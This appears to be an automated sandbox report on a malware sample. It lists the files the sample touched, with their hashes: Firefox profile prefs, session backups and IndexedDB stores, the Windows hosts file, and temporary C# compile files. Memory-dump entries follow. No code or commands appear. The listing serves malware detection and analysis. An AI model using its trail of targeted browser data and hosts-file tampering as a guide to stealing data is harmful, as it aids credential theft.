C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\prefs-1.js

Filesize
11KB

MD5
38e3ba69616154c2999e16fe835faa9b

SHA1
79aa3dd766f30f16e60b169c0e9f88fa4450eeaf

SHA256
89166603600c86a3cc426f611843534779e963607b85dd2da5344c45f95adae8

SHA512
3983179f90f6e2690225057a374abcf93b468ce4a9ac695907c24d3d61a5641bee2c91cbbddb7f6bc6decd208088a56fc720501d79226012eeb349a25e45fac2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\prefs-1.js

Filesize
12KB

MD5
e1da48a7a7de85628f0fde6121722bb1

SHA1
43e3d84c48d1497e54f4b788f779c87d749c861f

SHA256
126e4dc0ee1ee666d2fbd34485f8b1a01e62229085b61724019333583896148b

SHA512
fbc224e5b4263629009d88a5020fa40df5b22e253afc878100ebf1717c097ab241c3098a0c572f90b60b94f44086e3305f0288f920879c7bf914e6985ae8f777

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\prefs.js

Filesize
11KB

MD5
35f981dd476a3f6a84cb68973637fc48

SHA1
e00a13707bcebfc31751cbdce1bae645ff1ad47e

SHA256
c0c4beb36acf444f089f70b541111e4577b72eaa2ef1026e6460c36385f31f4c

SHA512
a106e05dbbc621cc49cc25a46e406a0ebe273518b0d322a489e2a10b733a95ac438170f10736c85fcde5d91d60fdc48c5fe34f884ba95f1d7f2777e31594e949

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\sessionstore-backups\recovery.baklz4

Filesize
3KB

MD5
50142d55dd98a4b53ebf71bc97631753

SHA1
e8f637f6f4c854e0bbb799eee8d87be2fad4a396

SHA256
245b52fc409191618597de4bb3c7338aaa867ac1636a42d3b625ad755326ac63

SHA512
ac4e63eb5accf2d937614d3c3e35306250875bf7c8b1c1e8d5a525d3490abd12b663f212e33f04a9b154066e3ff68d7794d9c33b632034a6ef714fb323165a21

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\sessionstore-backups\recovery.baklz4

Filesize
4KB

MD5
20eda93b24ee2dbfb7ff8d5f575359e9

SHA1
bb8c1830f404790b121479cdd94c22972c9e5de4

SHA256
b0e2a05b8ca6b1ed0ff3ae6523634425ed3ee90dbaed88dd3953f2d6a366722e

SHA512
ad532dcd89b52f57e2ee7515afa298a10757309597bfe38d1128b111c58781560fd135a49b7f538d2b63c7f637fd789d73d7c9215d7ee812dc9987d397ec498e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\sessionstore-backups\recovery.baklz4

Filesize
4KB

MD5
551559a2e9d52b870821e98cd65eb25e

SHA1
a6e8e3c08ff7e176e718f6c716b479e895764eca

SHA256
4af9611a6e73d9b3931d3b616119c5ccf7033966a62f878f32744cbe5813f4ab

SHA512
4eb457a4a2d881316445a748d8f52c3f778c1c19d2be38abde016ea8688a6e6e1cdaa35da018844adfa12d75e09ce10bc2908c929aaff81c082f970c476775fd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
576KB

MD5
9d1e59953c482f4b78b621b824456d3c

SHA1
d6890d75350c571f439906e57fb0d8c8d37437e8

SHA256
2ceb1f94a70367ee2dabea1301b0bfb5a52b103335a7045299e3fb5eec6b6be0

SHA512
efff2fac5bbb7fea8dec45666d2b66a625cc42c3454211e33f6796620c5a30871a0af94d32655c33c9faaafa06c26c509a718df5cc167898ebe48969b4ab8fb5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
384KB

MD5
6feabc4689a5552f7b52a19ffab0eef9

SHA1
48234cadd8b6d454ec230fd332402fc55549d42b

SHA256
569b4ae7814718600a351b053f1992f6ff8fbed2e12c3e00276703e27e57deb1

SHA512
276eb8715572cded564a614522886cfe588f1ed43a0112dbfafdbda0a039be3c2e765dbdf5cefb78827a3c308df81cf74e0d98249b44b2349d87640b80b24f3e

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qnuj0ney\CSCDFF1F6CBD70D4BE7AF6339F36D49F1BE.TMP

Filesize
652B

MD5
81ab6b8f014989e69d1caa4341f25f29

SHA1
a7fb0f74c09274818623e66b83f70d2c4531acfe

SHA256
942b7da59e668b7d7faf5be0c5f10b4a7cac0a598dfcf6e4b700980189789e8d

SHA512
1a7b52659b102e89b2526113cb619e54a7dd8f063a50399714e49300d4e5611b90b8b425bb1047f3171b59fc1cc220ba2ab8bfc8857b6b7f97c7d2df1099db65

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qnuj0ney\qnuj0ney.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qnuj0ney\qnuj0ney.cmdline

Filesize
607B

MD5
b4dccfe79154d7c8f1a31b166525af25

SHA1
08fb75c6dfe8372d3becdb543980406cac52f637

SHA256
d91a40765685d58f7697d9821c58db9df10be285c62dd08bc0db8541643c9c44

SHA512
92ce7f462524e36bb412e303065f8ef3d71fcb09b38fb139bea08c88178da8232964603556d2cc41e49afaf193216aa7cfc989ab642f75efa4a5cc18bd029da8

Download Submit
memory/1280-80-0x00007FF9CF8E0000-0x00007FF9CF903000-memory.dmp

Filesize
140KB

Download
memory/1280-251-0x00007FF9C9260000-0x00007FF9C932D000-memory.dmp

Filesize
820KB

Download
memory/1280-252-0x00007FF9C0320000-0x00007FF9C0840000-memory.dmp

Filesize
5.1MB

Download
memory/1280-241-0x00007FF9C9900000-0x00007FF9C9EE9000-memory.dmp

Filesize
5.9MB

Download
memory/1280-242-0x00007FF9D0350000-0x00007FF9D0373000-memory.dmp

Filesize
140KB

Download
memory/1280-81-0x00007FF9C0200000-0x00007FF9C031C000-memory.dmp

Filesize
1.1MB

Download
memory/1280-25-0x00007FF9C9900000-0x00007FF9C9EE9000-memory.dmp

Filesize
5.9MB

Download
memory/1280-247-0x00007FF9CA290000-0x00007FF9CA407000-memory.dmp

Filesize
1.5MB

Download
memory/1280-114-0x0000019DDFF90000-0x0000019DE04B0000-memory.dmp

Filesize
5.1MB

Download
memory/1280-113-0x00007FF9C0320000-0x00007FF9C0840000-memory.dmp

Filesize
5.1MB

Download
memory/1280-112-0x00007FF9C9260000-0x00007FF9C932D000-memory.dmp

Filesize
820KB

Download
memory/1280-111-0x00007FF9CF880000-0x00007FF9CF8B3000-memory.dmp

Filesize
204KB

Download
memory/1280-110-0x00007FF9CFEC0000-0x00007FF9CFECD000-memory.dmp

Filesize
52KB

Download
memory/1280-109-0x00007FF9CF8C0000-0x00007FF9CF8D9000-memory.dmp

Filesize
100KB

Download
memory/1280-102-0x00007FF9CA290000-0x00007FF9CA407000-memory.dmp

Filesize
1.5MB

Download
memory/1280-76-0x00007FF9CF600000-0x00007FF9CF614000-memory.dmp

Filesize
80KB

Download
memory/1280-30-0x00007FF9D0350000-0x00007FF9D0373000-memory.dmp

Filesize
140KB

Download
memory/1280-250-0x00007FF9CF880000-0x00007FF9CF8B3000-memory.dmp

Filesize
204KB

Download
memory/1280-315-0x00007FF9C9900000-0x00007FF9C9EE9000-memory.dmp

Filesize
5.9MB

Download
memory/1280-78-0x00007FF9CFDF0000-0x00007FF9CFDFD000-memory.dmp

Filesize
52KB

Download
memory/1280-74-0x0000019DDFF90000-0x0000019DE04B0000-memory.dmp

Filesize
5.1MB

Download
memory/1280-72-0x00007FF9C0320000-0x00007FF9C0840000-memory.dmp

Filesize
5.1MB

Download
memory/1280-70-0x00007FF9C9260000-0x00007FF9C932D000-memory.dmp

Filesize
820KB

Download
memory/1280-71-0x00007FF9D0350000-0x00007FF9D0373000-memory.dmp

Filesize
140KB

Download
memory/1280-68-0x00007FF9C9900000-0x00007FF9C9EE9000-memory.dmp

Filesize
5.9MB

Download
memory/1280-66-0x00007FF9CF880000-0x00007FF9CF8B3000-memory.dmp

Filesize
204KB

Download
memory/1280-64-0x00007FF9CFEC0000-0x00007FF9CFECD000-memory.dmp

Filesize
52KB

Download
memory/1280-62-0x00007FF9CF8C0000-0x00007FF9CF8D9000-memory.dmp

Filesize
100KB

Download
memory/1280-60-0x00007FF9CA290000-0x00007FF9CA407000-memory.dmp

Filesize
1.5MB

Download
memory/1280-58-0x00007FF9CF8E0000-0x00007FF9CF903000-memory.dmp

Filesize
140KB

Download
memory/1280-56-0x00007FF9D6B80000-0x00007FF9D6B99000-memory.dmp

Filesize
100KB

Download
memory/1280-54-0x00007FF9CF910000-0x00007FF9CF93D000-memory.dmp

Filesize
180KB

Download
memory/1280-32-0x00007FF9D8760000-0x00007FF9D876F000-memory.dmp

Filesize
60KB

Download
memory/3092-87-0x000002E32BDB0000-0x000002E32BDD2000-memory.dmp

Filesize
136KB

Download
memory/4008-200-0x0000019B9DE60000-0x0000019B9DE68000-memory.dmp

Filesize
32KB

Download